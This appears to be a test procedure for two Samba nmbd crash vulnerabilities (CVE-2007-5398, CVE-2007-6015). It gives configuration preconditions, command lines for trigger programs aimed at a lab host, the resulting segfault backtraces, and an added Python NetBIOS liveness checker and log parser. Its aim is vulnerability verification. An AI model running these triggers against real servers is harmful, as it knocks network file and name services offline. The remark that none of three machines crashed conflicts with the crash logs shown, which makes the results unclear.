while true; do python CVE-2007_5398-trigger.py --host 192.168.0.101; echo ...;sleep 2;done
Expected result:
After the second iteration you receive the following message, which indicates that the nmbd service has crashed:
$ while true; do python CVE-2007_5398-trigger.py --host 192.168.0.101; echo ...;sleep 2;done
...
...
Traceback (most recent call last):
File "CVE-2007_5398-trigger.py", line 166, in <module>
main(sys.argv[1:])
File "CVE-2007_5398-trigger.py", line 163, in main
exploit.run()
File "CVE-2007_5398-trigger.py", line 141, in run
self.SendPackets(packets)
File "CVE-2007_5398-trigger.py", line 133, in SendPackets
skt.send(packet)
socket.error: [Errno 111] Connection refused
Output on the nmbd side:
INTERNAL ERROR: Signal 11 in pid 7501 (3.0.25b)
Please read the Trouble-Shooting section of the Samba3-HOWTO
From: http://www.samba.org/samba/docs/Samba3-HOWTO.pdf
===============================================================
smb_panic: clobber_region() last called from [name_to_unstring(58)]
PANIC (pid 7501): internal error
BACKTRACE: 12 stack frames:
#0 nmbd(log_stack_trace+0x29) [0xb77105fc]
#1 nmbd(smb_panic+0xe4) [0xb7710793]
#2 nmbd(fault_setup+0) [0xb76fd03c]
#3 [0xb7645400]
#4 nmbd(+0x84e12) [0xb76e8e12]
#5 nmbd(debug_nmb_packet+0x1f8) [0xb76e917a]
#6 nmbd(reply_netbios_packet+0x67e) [0xb769928a]
#7 nmbd(wins_process_name_query_request+0x5be) [0xb76a4aef]
#8 nmbd(run_packet_queue+0x645) [0xb76999ba]
#9 nmbd(main+0xab4) [0xb768ab5f]
#10 /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6) [0xb72d1e46]
#11 nmbd(+0x24d51) [0xb7688d51]
smb_panic(): calling panic action [/usr/share/samba/panic-action 7501]
smb_panic(): action returned status 0
dumping core in /opt/samba-3.0.25b/var/cores/nmbd
[1] 7501 abort (core dumped) nmbd -i -S -M single -d 1
$ ./CVE-2007_6015-trigger AAAA 192.168.0.101
smb_mailslot() POC by asmx86@gmail.com
[*] packet sent
Expected result:
Run the following program to check whether the service is still running:
$ bin/nmblookup -d10 -A 192.168.0.101
Looking up status of 192.168.0.101
Sending a packet of len 50 to (192.168.0.101) on port 137
Sending a packet of len 50 to (192.168.0.101) on port 137
No reply from 192.168.0.101
This indicates that the service has crashed.
The server-side error log is as follows:
smb_panic: clobber_region() last called from [make_nmb_name(863)]
PANIC (pid 9215): internal error
BACKTRACE: 5 stack frames:
#0 nmbd(log_stack_trace+0x29) [0xb77275fc]
#1 nmbd(smb_panic+0xe4) [0xb7727793]
#2 nmbd(fault_setup+0) [0xb771403c]
#3 [0xb765c400]
#4 nmbd(send_mailslot+0x179) [0xb76b2320]
smb_panic(): calling panic action [/usr/share/samba/panic-action 9215]
smb_panic(): action returned status 0
dumping core in /opt/samba-3.0.25b/var/cores/nmbd
[1] 9215 abort (core dumped) nmbd -i -S -M single -d 1
CVE-2007-5398
To exploit this CVE, the following condition must be met:
Set in smb.conf:
wins support = yes
Test method:
Start nmbd:
nmbd -i -S -M single -d 1
Run the trigger (the while loop shown above).
Expected result:
After the second iteration the trigger reports "Connection refused", as shown above, which indicates that the nmbd service has crashed.
Output on the nmbd side: the "INTERNAL ERROR: Signal 11" panic and backtrace shown above.
If the above results are observed, the vulnerability is present.
Tested on 3 machines; none triggered.
CVE-2007-6015
To test this CVE, the following condition must be met:
Set smb.conf as follows:
domain logons = yes
Test method:
Compile:
gcc CVE-2007_6015-trigger.c -o CVE-2007_6015-trigger
Start nmbd:
nmbd -i -S -M single -d 1
Query the NetBIOS name of the target machine; AAAA in the trigger command above is the NetBIOS name of 192.168.0.101.
Run the trigger (./CVE-2007_6015-trigger AAAA 192.168.0.101, shown above).
Expected result:
Run nmblookup as shown above to check whether the service is still running; "No reply from 192.168.0.101" indicates that the service has crashed.
The server-side error log is the smb_panic in send_mailslot shown above.
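The "check whether the service is still running" step above (nmblookup -A) can be automated as a liveness check for nmbd, and the panic markers in the nmbd log can be scanned the same way. The following Python script is an added example and is not part of the issue or of the trigger programs it describes: it builds the same NetBIOS node status query that nmblookup sends (the 50-byte datagram reported in the output above), parses the answer, and extracts the pids from "INTERNAL ERROR: Signal 11 in pid ..." / "PANIC (pid ...)" log lines. The host name SAMBASRV, the workgroup name, and the sample response datagram are constructed for the example; the sample log lines are copied from the nmbd output above.

```python
import os
import re
import socket
import struct
import sys

NBSTAT = 0x0021        # RR type of a NetBIOS node status request/response (RFC 1002)
NB_CLASS_IN = 0x0001

# Panic markers as printed by nmbd in the logs above; both carry the pid.
PANIC_RE = re.compile(r"INTERNAL ERROR: Signal \d+ in pid (\d+)|PANIC \(pid (\d+)\)")


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encode a NetBIOS name (RFC 1002 4.1): pad to 15 bytes, append
    the 1-byte suffix, emit two 'A'-offset nibbles per byte, and frame the result
    with a length byte (always 0x20) and a 0x00 terminator. The wildcard '*' used
    by node status queries is padded with NUL bytes, ordinary names with spaces."""
    pad = b"\x00" if name == "*" else b" "
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(ord("A") + (b >> 4))
        encoded.append(ord("A") + (b & 0x0F))
    return bytes([len(encoded)]) + bytes(encoded) + b"\x00"


def build_node_status_query(txid: int) -> bytes:
    """Build the NBSTAT query datagram that nmblookup -A sends to UDP/137:
    12-byte header (1 question) followed by the '*' name, QTYPE NBSTAT, QCLASS IN."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_netbios_name("*") + struct.pack("!HH", NBSTAT, NB_CLASS_IN)
    return header + question


def parse_node_status_response(data: bytes, txid: int):
    """Return [(name, suffix, flags), ...] from a node status response, or None if
    the datagram is not a well-formed NBSTAT answer to our transaction id."""
    if len(data) < 12:
        return None
    rid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000 or an < 1:
        return None
    off = 12
    name_len = data[off]                      # answer RR: length byte, name, 0x00
    off += 1 + name_len + 1
    if len(data) < off + 10:
        return None
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        return None
    rdata = data[off:off + rdlen]
    names = []
    for i in range(rdata[0] if rdata else 0):  # NUM_NAMES, then 18-byte entries
        entry = rdata[1 + i * 18:1 + (i + 1) * 18]
        if len(entry) < 18:
            break
        nm = entry[:15].decode("ascii", "replace").rstrip()
        names.append((nm, entry[15], struct.unpack("!H", entry[16:18])[0]))
    return names


def nmbd_alive(host: str, timeout: float = 2.0, port: int = 137) -> bool:
    """Liveness check: True if host answers a node status query within timeout."""
    txid = int.from_bytes(os.urandom(2), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        try:
            s.sendto(build_node_status_query(txid), (host, port))
            data, _ = s.recvfrom(4096)
        except OSError:                       # timeout, ICMP unreachable, ...
            return False
    return parse_node_status_response(data, txid) is not None


def panic_pids(lines):
    """Sorted list of nmbd pids that logged a signal/panic in the given log lines."""
    pids = set()
    for line in lines:
        m = PANIC_RE.search(line)
        if m:
            pids.add(int(m.group(1) or m.group(2)))
    return sorted(pids)


def sample_node_status_response(txid: int) -> bytes:
    """Constructed response datagram (not captured traffic) for offline testing."""
    hdr = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    entries = b""
    for nm, suf, fl in (("SAMBASRV", 0x00, 0x0400), ("SAMBASRV", 0x20, 0x0400),
                        ("WORKGROUP", 0x00, 0x8400)):
        entries += nm.ljust(15).encode("ascii") + bytes([suf]) + struct.pack("!H", fl)
    rdata = bytes([3]) + entries + bytes(46)  # count, names, zeroed MAC + statistics
    rr = encode_netbios_name("*") + struct.pack("!HHIH", NBSTAT, NB_CLASS_IN, 0, len(rdata))
    return hdr + rr + rdata


# Lines copied from the nmbd panic output shown in the issue above.
SAMPLE_NMBD_LOG = [
    "INTERNAL ERROR: Signal 11 in pid 7501 (3.0.25b)",
    "PANIC (pid 7501): internal error",
    "smb_panic(): action returned status 0",
    "dumping core in /opt/samba-3.0.25b/var/cores/nmbd",
]

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.101"
    print(f"{host}: nmbd {'alive' if nmbd_alive(host) else 'NOT responding'}")
    print("panicking pids in sample log:", panic_pids(SAMPLE_NMBD_LOG))
```

Run it as `python nmbd_health.py 192.168.0.101` between trigger iterations; a transition from "alive" to "NOT responding" is the same signal as the "No reply from 192.168.0.101" line from nmblookup, and feeding the live nmbd log to panic_pids ties the outage to the crashed process id.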